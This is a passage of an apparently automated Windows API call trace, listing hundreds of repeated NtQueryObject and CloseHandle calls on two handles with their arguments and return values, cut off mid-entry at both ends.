CloseHandle (hObject=0x1cc) returned 1 [0043.498] CloseHandle (hObject=0x1c8) returned 1 [0043.498] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.499] CloseHandle (hObject=0x1cc) returned 1 [0043.499] CloseHandle (hObject=0x1c8) returned 1 [0043.499] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.499] CloseHandle (hObject=0x1cc) returned 1 [0043.499] CloseHandle (hObject=0x1c8) returned 1 [0043.499] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.499] CloseHandle (hObject=0x1cc) returned 1 [0043.499] CloseHandle (hObject=0x1c8) returned 1 [0043.499] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.499] CloseHandle (hObject=0x1cc) returned 1 [0043.499] CloseHandle (hObject=0x1c8) returned 1 [0043.499] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.499] CloseHandle (hObject=0x1cc) returned 1 [0043.499] CloseHandle (hObject=0x1c8) returned 1 [0043.499] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.499] CloseHandle (hObject=0x1cc) returned 1 [0043.499] CloseHandle (hObject=0x1c8) returned 1 [0043.499] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.499] CloseHandle (hObject=0x1cc) returned 1 [0043.499] CloseHandle (hObject=0x1c8) returned 1 [0043.500] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.500] CloseHandle (hObject=0x1cc) returned 1 [0043.500] CloseHandle (hObject=0x1c8) returned 1 [0043.500] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.500] CloseHandle (hObject=0x1cc) returned 1 [0043.500] CloseHandle (hObject=0x1c8) returned 1 [0043.500] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.500] CloseHandle (hObject=0x1cc) returned 1 [0043.500] CloseHandle (hObject=0x1c8) returned 1 [0043.500] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.500] CloseHandle (hObject=0x1cc) returned 1 [0043.500] CloseHandle (hObject=0x1c8) returned 1 [0043.500] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.500] CloseHandle (hObject=0x1cc) returned 1 [0043.500] CloseHandle (hObject=0x1c8) returned 1 [0043.500] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.500] CloseHandle (hObject=0x1cc) returned 1 [0043.500] CloseHandle (hObject=0x1c8) returned 1 [0043.500] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.500] CloseHandle (hObject=0x1cc) returned 1 [0043.500] CloseHandle (hObject=0x1c8) returned 1 [0043.501] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.501] CloseHandle (hObject=0x1cc) returned 1 [0043.501] CloseHandle (hObject=0x1c8) returned 1 [0043.501] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.501] CloseHandle (hObject=0x1cc) returned 1 [0043.501] CloseHandle (hObject=0x1c8) returned 1 [0043.501] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.501] CloseHandle (hObject=0x1cc) returned 1 [0043.501] CloseHandle (hObject=0x1c8) returned 1 [0043.501] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.501] CloseHandle (hObject=0x1cc) returned 1 [0043.501] CloseHandle (hObject=0x1c8) returned 1 [0043.501] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.501] CloseHandle (hObject=0x1cc) returned 1 [0043.501] CloseHandle (hObject=0x1c8) returned 1 [0043.501] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.501] CloseHandle (hObject=0x1cc) returned 1 [0043.501] CloseHandle (hObject=0x1c8) returned 1 [0043.501] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.501] CloseHandle (hObject=0x1cc) returned 1 [0043.501] CloseHandle (hObject=0x1c8) returned 1 [0043.502] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.502] CloseHandle (hObject=0x1cc) returned 1 [0043.502] CloseHandle (hObject=0x1c8) returned 1 [0043.502] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.502] CloseHandle (hObject=0x1cc) returned 1 [0043.502] CloseHandle (hObject=0x1c8) returned 1 [0043.502] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.502] CloseHandle (hObject=0x1cc) returned 1 [0043.502] CloseHandle (hObject=0x1c8) returned 1 [0043.502] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.502] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x1, ObjectInformation=0x2634030, ObjectInformationLength=0x400, ReturnLength=0x18a964 | out: ObjectInformation=0x2634030, ReturnLength=0x18a964) returned 0x0 [0043.502] CloseHandle (hObject=0x1cc) returned 1 [0043.502] CloseHandle (hObject=0x1c8) returned 1 [0043.502] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.502] CloseHandle (hObject=0x1cc) returned 1 [0043.502] CloseHandle (hObject=0x1c8) returned 1 [0043.502] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.502] CloseHandle (hObject=0x1cc) returned 1 [0043.502] CloseHandle (hObject=0x1c8) returned 1 [0043.503] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.503] CloseHandle (hObject=0x1cc) returned 1 [0043.503] CloseHandle (hObject=0x1c8) returned 1 [0043.503] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.503] CloseHandle (hObject=0x1cc) returned 1 [0043.503] CloseHandle (hObject=0x1c8) returned 1 [0043.503] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.503] CloseHandle (hObject=0x1cc) returned 1 [0043.503] CloseHandle (hObject=0x1c8) returned 1 [0043.503] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.503] CloseHandle (hObject=0x1cc) returned 1 [0043.503] CloseHandle (hObject=0x1c8) returned 1 [0043.503] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.503] CloseHandle (hObject=0x1cc) returned 1 [0043.503] CloseHandle (hObject=0x1c8) returned 1 [0043.503] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.503] CloseHandle (hObject=0x1cc) returned 1 [0043.503] CloseHandle (hObject=0x1c8) returned 1 [0043.503] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.503] CloseHandle (hObject=0x1cc) returned 1 [0043.503] CloseHandle (hObject=0x1c8) returned 1 [0043.504] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.504] CloseHandle (hObject=0x1cc) returned 1 [0043.504] CloseHandle (hObject=0x1c8) returned 1 [0043.504] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.504] CloseHandle (hObject=0x1cc) returned 1 [0043.504] CloseHandle (hObject=0x1c8) returned 1 [0043.504] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.504] CloseHandle (hObject=0x1cc) returned 1 [0043.504] CloseHandle (hObject=0x1c8) returned 1 [0043.504] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.504] CloseHandle (hObject=0x1cc) returned 1 [0043.504] CloseHandle (hObject=0x1c8) returned 1 [0043.504] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.504] CloseHandle (hObject=0x1cc) returned 1 [0043.504] CloseHandle (hObject=0x1c8) returned 1 [0043.504] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.504] CloseHandle (hObject=0x1cc) returned 1 [0043.504] CloseHandle (hObject=0x1c8) returned 1 [0043.505] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.505] CloseHandle (hObject=0x1cc) returned 1 [0043.505] CloseHandle (hObject=0x1c8) returned 1 [0043.505] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.505] CloseHandle (hObject=0x1cc) returned 1 [0043.505] CloseHandle (hObject=0x1c8) returned 1 [0043.505] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.505] CloseHandle (hObject=0x1cc) returned 1 [0043.505] CloseHandle (hObject=0x1c8) returned 1 [0043.505] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.505] CloseHandle (hObject=0x1cc) returned 1 [0043.505] CloseHandle (hObject=0x1c8) returned 1 [0043.505] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.505] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x1, ObjectInformation=0x2634030, ObjectInformationLength=0x400, ReturnLength=0x18a964 | out: ObjectInformation=0x2634030, ReturnLength=0x18a964) returned 0x0 [0043.505] CloseHandle (hObject=0x1cc) returned 1 [0043.505] CloseHandle (hObject=0x1c8) returned 1 [0043.505] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.505] CloseHandle (hObject=0x1cc) returned 1 [0043.506] CloseHandle (hObject=0x1c8) returned 1 [0043.506] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.506] CloseHandle (hObject=0x1cc) returned 1 [0043.506] CloseHandle (hObject=0x1c8) returned 1 [0043.506] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.506] CloseHandle (hObject=0x1cc) returned 1 [0043.506] CloseHandle (hObject=0x1c8) returned 1 [0043.506] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.506] CloseHandle (hObject=0x1cc) returned 1 [0043.506] CloseHandle (hObject=0x1c8) returned 1 [0043.506] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.506] CloseHandle (hObject=0x1cc) returned 1 [0043.506] CloseHandle (hObject=0x1c8) returned 1 [0043.506] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.506] CloseHandle (hObject=0x1cc) returned 1 [0043.506] CloseHandle (hObject=0x1c8) returned 1 [0043.506] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.506] CloseHandle (hObject=0x1cc) returned 1 [0043.506] CloseHandle (hObject=0x1c8) returned 1 [0043.506] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.506] CloseHandle (hObject=0x1cc) returned 1 [0043.507] CloseHandle (hObject=0x1c8) returned 1 [0043.507] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.507] CloseHandle (hObject=0x1cc) returned 1 [0043.507] CloseHandle (hObject=0x1c8) returned 1 [0043.507] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.507] CloseHandle (hObject=0x1cc) returned 1 [0043.507] CloseHandle (hObject=0x1c8) returned 1 [0043.507] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.507] CloseHandle (hObject=0x1cc) returned 1 [0043.507] CloseHandle (hObject=0x1c8) returned 1 [0043.507] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.507] CloseHandle (hObject=0x1cc) returned 1 [0043.507] CloseHandle (hObject=0x1c8) returned 1 [0043.507] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.507] CloseHandle (hObject=0x1cc) returned 1 [0043.507] CloseHandle (hObject=0x1c8) returned 1 [0043.507] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.507] CloseHandle (hObject=0x1cc) returned 1 [0043.507] CloseHandle (hObject=0x1c8) returned 1 [0043.507] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.508] CloseHandle (hObject=0x1cc) returned 1 [0043.508] CloseHandle (hObject=0x1c8) returned 1 [0043.508] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.508] CloseHandle (hObject=0x1cc) returned 1 [0043.508] CloseHandle (hObject=0x1c8) returned 1 [0043.508] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.508] CloseHandle (hObject=0x1cc) returned 1 [0043.508] CloseHandle (hObject=0x1c8) returned 1 [0043.508] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.508] CloseHandle (hObject=0x1cc) returned 1 [0043.508] CloseHandle (hObject=0x1c8) returned 1 [0043.508] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.508] CloseHandle (hObject=0x1cc) returned 1 [0043.508] CloseHandle (hObject=0x1c8) returned 1 [0043.508] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.508] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x1, ObjectInformation=0x2634030, ObjectInformationLength=0x400, ReturnLength=0x18a964 | out: ObjectInformation=0x2634030, ReturnLength=0x18a964) returned 0x0 [0043.508] CloseHandle (hObject=0x1cc) returned 1 [0043.508] CloseHandle (hObject=0x1c8) returned 1 [0043.508] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.508] CloseHandle (hObject=0x1cc) returned 1 [0043.508] CloseHandle (hObject=0x1c8) returned 1 [0043.509] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.509] CloseHandle (hObject=0x1cc) returned 1 [0043.509] CloseHandle (hObject=0x1c8) returned 1 [0043.509] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.509] CloseHandle (hObject=0x1cc) returned 1 [0043.509] CloseHandle (hObject=0x1c8) returned 1 [0043.509] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.509] CloseHandle (hObject=0x1cc) returned 1 [0043.509] CloseHandle (hObject=0x1c8) returned 1 [0043.509] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.509] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x1, ObjectInformation=0x2634030, ObjectInformationLength=0x400, ReturnLength=0x18a964 | out: ObjectInformation=0x2634030, ReturnLength=0x18a964) returned 0x0 [0043.509] CloseHandle (hObject=0x1cc) returned 1 [0043.509] CloseHandle (hObject=0x1c8) returned 1 [0043.509] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.509] CloseHandle (hObject=0x1cc) returned 1 [0043.509] CloseHandle (hObject=0x1c8) returned 1 [0043.509] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.509] CloseHandle (hObject=0x1cc) returned 1 [0043.509] CloseHandle (hObject=0x1c8) returned 1 [0043.509] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.510] CloseHandle (hObject=0x1cc) returned 1 [0043.510] CloseHandle (hObject=0x1c8) returned 1 [0043.510] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.510] CloseHandle (hObject=0x1cc) returned 1 [0043.510] CloseHandle (hObject=0x1c8) returned 1 [0043.510] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.510] CloseHandle (hObject=0x1cc) returned 1 [0043.510] CloseHandle (hObject=0x1c8) returned 1 [0043.510] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.510] CloseHandle (hObject=0x1cc) returned 1 [0043.510] CloseHandle (hObject=0x1c8) returned 1 [0043.510] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.510] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x1, ObjectInformation=0x2634030, ObjectInformationLength=0x400, ReturnLength=0x18a964 | out: ObjectInformation=0x2634030, ReturnLength=0x18a964) returned 0x0 [0043.510] CloseHandle (hObject=0x1cc) returned 1 [0043.510] CloseHandle (hObject=0x1c8) returned 1 [0043.510] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.510] CloseHandle (hObject=0x1cc) returned 1 [0043.510] CloseHandle (hObject=0x1c8) returned 1 [0043.510] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.510] CloseHandle (hObject=0x1cc) returned 1 [0043.510] CloseHandle (hObject=0x1c8) returned 1 [0043.511] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.511] CloseHandle (hObject=0x1cc) returned 1 [0043.511] CloseHandle (hObject=0x1c8) returned 1 [0043.511] NtQueryObject (in: Handle=0x1cc, ObjectInformationClass=0x2, ObjectInformation=0x2fe60, ObjectInformationLength=0xa0, ReturnLength=0x18a964 | out: ObjectInformation=0x2fe60, ReturnLength=0x18a964) returned 0x0 [0043.511] CloseHandle (hObject=0x1cc) returned 1 [0043.511] CloseHandle (hObject=0x1c8) returned 1 [0043.511] NtQueryObject (in: 